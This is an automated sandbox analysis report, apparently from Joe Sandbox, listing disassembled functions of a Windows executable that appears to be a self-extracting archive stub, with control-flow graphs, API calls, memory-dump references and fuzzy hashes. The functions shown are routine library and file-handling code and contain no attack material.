                                                              control_flow_graph 913 44a95b-44a974 914 44a976-44a986 call 44ef4c 913->914 915 44a98a-44a98f 913->915 914->915 922 44a988 914->922 917 44a991-44a999 915->917 918 44a99c-44a9c0 MultiByteToWideChar 915->918 917->918 920 44a9c6-44a9d2 918->920 921 44ab53-44ab66 call 43fbbc 918->921 923 44a9d4-44a9e5 920->923 924 44aa26 920->924 922->915 927 44aa04-44aa15 call 448e06 923->927 928 44a9e7-44a9f6 call 452010 923->928 926 44aa28-44aa2a 924->926 930 44aa30-44aa43 MultiByteToWideChar 926->930 931 44ab48 926->931 927->931 941 44aa1b 927->941 928->931 940 44a9fc-44aa02 928->940 930->931 934 44aa49-44aa5b call 44af6c 930->934 935 44ab4a-44ab51 call 44abc3 931->935 943 44aa60-44aa64 934->943 935->921 942 44aa21-44aa24 940->942 941->942 942->926 943->931 945 44aa6a-44aa71 943->945 946 44aa73-44aa78 945->946 947 44aaab-44aab7 945->947 946->935 948 44aa7e-44aa80 946->948 949 44ab03 947->949 950 44aab9-44aaca 947->950 948->931 953 44aa86-44aaa0 call 44af6c 948->953 954 44ab05-44ab07 949->954 951 44aae5-44aaf6 call 448e06 950->951 952 44aacc-44aadb call 452010 950->952 958 44ab41-44ab47 call 44abc3 951->958 967 44aaf8 951->967 952->958 965 44aadd-44aae3 952->965 953->935 968 44aaa6 953->968 954->958 959 44ab09-44ab22 call 44af6c 954->959 958->931 959->958 971 44ab24-44ab2b 959->971 970 44aafe-44ab01 965->970 967->970 968->931 970->954 972 44ab67-44ab6d 971->972 973 44ab2d-44ab2e 971->973 974 44ab2f-44ab3f WideCharToMultiByte 972->974 973->974 974->958 975 44ab6f-44ab76 call 44abc3 974->975 975->935
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00445695,00445695,?,?,?,0044ABAC,00000001,00000001,2DE85006), ref: 0044A9B5
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0044ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0044AA3B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AB35
                                                              • __freea.LIBCMT ref: 0044AB42
                                                                • Part of subcall function 00448E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0044CA2C,00000000,?,00446CBE,?,00000008,?,004491E0,?,?,?), ref: 00448E38
                                                              • __freea.LIBCMT ref: 0044AB4B
                                                              • __freea.LIBCMT ref: 0044AB70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 63ea95898f3270ba7ccde3ee619b2dabce502c80d2a53572af4a51d8dab3fe89
                                                              • Instruction ID: 525d489a51f437fadd9e66c9858a7d44691e7d948e19fe12ed99bb97f1aa7dfe
                                                              • Opcode Fuzzy Hash: 63ea95898f3270ba7ccde3ee619b2dabce502c80d2a53572af4a51d8dab3fe89
                                                              • Instruction Fuzzy Hash: 50511B72640256AFFB258F64CC42EBFB7AADB44714F15462EFE04D6240DB38EC60C65A
                                                              Function 00443B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 978 443b72-443b7c 979 443bee-443bf1 978->979 980 443bf3 979->980 981 443b7e-443b8c 979->981 984 443bf5-443bf9 980->984 982 443b95-443bb1 LoadLibraryExW 981->982 983 443b8e-443b91 981->983 987 443bb3-443bbc GetLastError 982->987 988 443bfa-443c00 982->988 985 443b93 983->985 986 443c09-443c0b 983->986 990 443beb 985->990 986->984 991 443be6-443be9 987->991 992 443bbe-443bd3 call 446088 987->992 988->986 989 443c02-443c03 FreeLibrary 988->989 989->986 990->979 991->990 992->991 995 443bd5-443be4 LoadLibraryExW 992->995 995->988 995->991
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00443C35,?,?,00482088,00000000,?,00443D60,00000004,InitializeCriticalSectionEx,00456394,InitializeCriticalSectionEx,00000000), ref: 00443C03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: 0812d3773edf7f196312f9c9334e7941e4ddf4e30d0e78cd6109de9d6678dba8
                                                              • Instruction ID: 2478fe459c469ba0fefb23dadfd92b9e1427d6272ddbdc400f9e55aafed7e43f
                                                              • Opcode Fuzzy Hash: 0812d3773edf7f196312f9c9334e7941e4ddf4e30d0e78cd6109de9d6678dba8
                                                              • Instruction Fuzzy Hash: 4411C432A04760ABEB228F589C4175A7764DF01BB2F210162F915EB291E768FE0086DD
                                                              Function 0043AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0043081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00430836
                                                                • Part of subcall function 0043081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0042F2D8,Crypt32.dll,00000000,0042F35C,?,?,0042F33E,?,?,?), ref: 00430858
                                                              • OleInitialize.OLE32(00000000), ref: 0043AC2F
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0043AC66
                                                              • SHGetMalloc.SHELL32(00468438), ref: 0043AC70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                              • String ID: riched20.dll$3Ro
                                                              • API String ID: 3498096277-3613677438
                                                              • Opcode ID: 2e37ad6eaa8b83f000b0abcf0d2a308b624fabd8ebefe9bbd14281b4505c0233
                                                              • Instruction ID: 3fb3786c4defffc53c8f45352850fa72eae62a32b8828ac6157201866b42d7e5
                                                              • Opcode Fuzzy Hash: 2e37ad6eaa8b83f000b0abcf0d2a308b624fabd8ebefe9bbd14281b4505c0233
                                                              • Instruction Fuzzy Hash: 4EF04FB1900209ABCB10AFAAD84999FFBFCEF84705F10412AA811E2241DBB85605CBA5
                                                              Function 004298E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1000 4298e0-429901 call 43ec50 1003 429903-429906 1000->1003 1004 42990c 1000->1004 1003->1004 1005 429908-42990a 1003->1005 1006 42990e-42991f 1004->1006 1005->1006 1007 429921 1006->1007 1008 429927-429931 1006->1008 1007->1008 1009 429933 1008->1009 1010 429936-429943 call 426edb 1008->1010 1009->1010 1013 429945 1010->1013 1014 42994b-42996a CreateFileW 1010->1014 1013->1014 1015 4299bb-4299bf 1014->1015 1016 42996c-42998e GetLastError call 42bb03 1014->1016 1018 4299c3-4299c6 1015->1018 1020 4299c8-4299cd 1016->1020 1022 429990-4299b3 CreateFileW GetLastError 1016->1022 1018->1020 1021 4299d9-4299de 1018->1021 1020->1021 1023 4299cf 1020->1023 1024 4299e0-4299e3 1021->1024 1025 4299ff-429a10 1021->1025 1022->1018 1026 4299b5-4299b9 1022->1026 1023->1021 1024->1025 1027 4299e5-4299f9 SetFileTime 1024->1027 1028 429a12-429a2a call 430602 1025->1028 1029 429a2e-429a39 1025->1029 1026->1018 1027->1025 1028->1029
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00427760,?,00000005,?,00000011), ref: 0042995F
                                                              • GetLastError.KERNEL32(?,?,00427760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0042996C
                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00427760,?,00000005,?), ref: 004299A2
                                                              • GetLastError.KERNEL32(?,?,00427760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004299AA
                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00427760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004299F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 041232061fe11bf3a252625f1603f6946f42e573a45f803fdf295d1bc7d7828e
                                                              • Instruction ID: 10b21fbd6b2904870b9f6aaaf818e06e70f311ccd8161e552f646b244454d495
                                                              • Opcode Fuzzy Hash: 041232061fe11bf3a252625f1603f6946f42e573a45f803fdf295d1bc7d7828e
                                                              • Instruction Fuzzy Hash: A93125B06443516FE7209F20DC46B9BBB94BB04330F500B1EF5A1923D1D7A8A994CB99
                                                              Function 0043B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1059 43b568-43b581 PeekMessageW 1060 43b583-43b597 GetMessageW 1059->1060 1061 43b5bc-43b5be 1059->1061 1062 43b599-43b5a6 IsDialogMessageW 1060->1062 1063 43b5a8-43b5b6 TranslateMessage DispatchMessageW 1060->1063 1062->1061 1062->1063 1063->1061
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B579
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043B58A
                                                              • IsDialogMessageW.USER32(00010484,?), ref: 0043B59E
                                                              • TranslateMessage.USER32(?), ref: 0043B5AC
                                                              • DispatchMessageW.USER32(?), ref: 0043B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: 1407d27a417dcd3a640c7865cbffb9cb9bb1a7cd48dabed988a6dc0df53d7092
                                                              • Instruction ID: 28f3efc95a013fc221e5cabc9a06ee1e7af391ed7f152caf5413b553603c5e21
                                                              • Opcode Fuzzy Hash: 1407d27a417dcd3a640c7865cbffb9cb9bb1a7cd48dabed988a6dc0df53d7092
                                                              • Instruction Fuzzy Hash: 1EF0BD71A0111ABBCB209FE5DC4CEDF7FACEE066957004929B505D2114EB78E605CBF9
                                                              Function 0043ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1064 43abab-43abca GetClassNameW 1065 43abf2-43abf4 1064->1065 1066 43abcc-43abe1 call 431fbb 1064->1066 1068 43abf6-43abf9 SHAutoComplete 1065->1068 1069 43abff-43ac01 1065->1069 1071 43abe3-43abef FindWindowExW 1066->1071 1072 43abf1 1066->1072 1068->1069 1071->1072 1072->1065
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0043ABC2
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0043ABF9
                                                                • Part of subcall function 00431FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0042C116,00000000,.exe,?,?,00000800,?,?,?,00438E3C), ref: 00431FD1
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0043ABE9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: EDIT
                                                              • API String ID: 4243998846-3080729518
                                                              • Opcode ID: 09857b87a0e6830eca9c7fb0936122d7d3cb89af81f1b3ab33610ae8dcc1cf46
                                                              • Instruction ID: 3462e08c189bcaf71d89d7b1b13b3e6a8020cbed3c2f074984b912f46d998bd6
                                                              • Opcode Fuzzy Hash: 09857b87a0e6830eca9c7fb0936122d7d3cb89af81f1b3ab33610ae8dcc1cf46
                                                              • Instruction Fuzzy Hash: FFF0E232A0022876DB205A249C09F9FB26C9B4AF01F484026BE40A2184D768EA4186BE
                                                              Function 0043DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1073 43dbde-43dc09 call 43ec50 SetEnvironmentVariableW call 430371 1077 43dc0e-43dc12 1073->1077 1078 43dc36-43dc38 1077->1078 1079 43dc14-43dc18 1077->1079 1080 43dc21-43dc28 call 43048d 1079->1080 1083 43dc1a-43dc20 1080->1083 1084 43dc2a-43dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                              APIs
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0043DBF4
                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0043DC30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 1431749950-3493335439
                                                              • Opcode ID: 5cc4db1677d01e06d187212b6496febcc89063af488cca92d6fe160a80e51977
                                                              • Instruction ID: 58cdcd4195940788a771f473c528075faf1a2b71664450b501f27038e4024f95
                                                              • Opcode Fuzzy Hash: 5cc4db1677d01e06d187212b6496febcc89063af488cca92d6fe160a80e51977
                                                              • Instruction Fuzzy Hash: 5DF0EC72815724A7CB201FA69C06BFB3B58AF1CB87F042417BD8595152E6BCCD40D6BC
                                                              Function 00429785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1085 429785-429791 1086 429793-42979b GetStdHandle 1085->1086 1087 42979e-4297b5 ReadFile 1085->1087 1086->1087 1088 429811 1087->1088 1089 4297b7-4297c0 call 4298bc 1087->1089 1090 429814-429817 1088->1090 1093 4297c2-4297ca 1089->1093 1094 4297d9-4297dd 1089->1094 1093->1094 1097 4297cc 1093->1097 1095 4297ee-4297f2 1094->1095 1096 4297df-4297e8 GetLastError 1094->1096 1099 4297f4-4297fc 1095->1099 1100 42980c-42980f 1095->1100 1096->1095 1098 4297ea-4297ec 1096->1098 1101 4297cd-4297d7 call 429785 1097->1101 1098->1090 1099->1100 1103 4297fe-429807 GetLastError 1099->1103 1100->1090 1101->1090 1103->1100 1105 429809-42980a 1103->1105 1105->1101
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00429795
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004297AD
                                                              • GetLastError.KERNEL32 ref: 004297DF
                                                              • GetLastError.KERNEL32 ref: 004297FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: 097a8d5a076bd0eae0a13ba031798b55f16f9cc6082e7875f0c06ef5d9c694c0
                                                              • Instruction ID: 7bbfe604cda5bc3189c63717388697a5a5a689af05ca368b78559069ec994a37
                                                              • Opcode Fuzzy Hash: 097a8d5a076bd0eae0a13ba031798b55f16f9cc6082e7875f0c06ef5d9c694c0
                                                              • Instruction Fuzzy Hash: 9611C630720324EBDF206F25E80466B37A9FB42765F94852BF416C6290D778CE44DB69
                                                              Function 0044AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00443F73,00000000,00000000,?,0044ACDB,00443F73,00000000,00000000,00000000,?,0044AED8,00000006,FlsSetValue), ref: 0044AD66
                                                              • GetLastError.KERNEL32(?,0044ACDB,00443F73,00000000,00000000,00000000,?,0044AED8,00000006,FlsSetValue,00457970,FlsSetValue,00000000,00000364,?,004498B7), ref: 0044AD72
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044ACDB,00443F73,00000000,00000000,00000000,?,0044AED8,00000006,FlsSetValue,00457970,FlsSetValue,00000000), ref: 0044AD80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: fdecc7c38fbd8ccbc7e925d558fdd505e36d25bccc8624c75eb3d90ddd08960b
                                                              • Instruction ID: 8474d4af21926402c80c46ddb2f8668014929d2f88f5a318d03eb86249da0190
                                                              • Opcode Fuzzy Hash: fdecc7c38fbd8ccbc7e925d558fdd505e36d25bccc8624c75eb3d90ddd08960b
                                                              • Instruction Fuzzy Hash: 66017B72A81732ABD7228F68DC44A577B5DEF44BB3B100635FC06D3691D728C811C6EA
                                                              Function 0044BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004497E5: GetLastError.KERNEL32(?,00461030,00444674,00461030,?,?,00443F73,00000050,?,00461030,00000200), ref: 004497E9
                                                                • Part of subcall function 004497E5: _free.LIBCMT ref: 0044981C
                                                                • Part of subcall function 004497E5: SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 0044985D
                                                                • Part of subcall function 004497E5: _abort.LIBCMT ref: 00449863
                                                                • Part of subcall function 0044BB4E: _abort.LIBCMT ref: 0044BB80
                                                                • Part of subcall function 0044BB4E: _free.LIBCMT ref: 0044BBB4
                                                                • Part of subcall function 0044B7BB: GetOEMCP.KERNEL32(00000000,?,?,0044BA44,?), ref: 0044B7E6
                                                              • _free.LIBCMT ref: 0044BA9F
                                                              • _free.LIBCMT ref: 0044BAD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorLast_abort
                                                              • String ID: pE
                                                              • API String ID: 2991157371-674470523
                                                              • Opcode ID: 7aa745c41f0554564ee2975493b0f09762d2b2b7c2813418cde98e5a0c50866c
                                                              • Instruction ID: 18b1dd552472d31f7b1c18dfb63c93218935b3cbf349b58e6d01e74e8a2a6766
                                                              • Opcode Fuzzy Hash: 7aa745c41f0554564ee2975493b0f09762d2b2b7c2813418cde98e5a0c50866c
                                                              • Instruction Fuzzy Hash: 6F31D531904209AFEB10DFA9C441B5E77E5EF40324F21449FE904AB2A2EB39DD40DB98
                                                              Function 0043E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: (C$PDu<C
                                                              • API String ID: 1269201914-1023926350
                                                              • Opcode ID: d1ae2edfa860f6f441456647e862314ee6900601afd7109b559ea82138852b94
                                                              • Instruction ID: a5a61257074aa01e0c1c163e1898d5db4f1f6f404a58b3c78b01702cdb42d1e7
                                                              • Opcode Fuzzy Hash: d1ae2edfa860f6f441456647e862314ee6900601afd7109b559ea82138852b94
                                                              • Instruction Fuzzy Hash: E7B012C165A140BC3108714B1D02D3F050CC0CAF1E730E42FF814C51C1E84D0D46193E
                                                              Function 0043E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
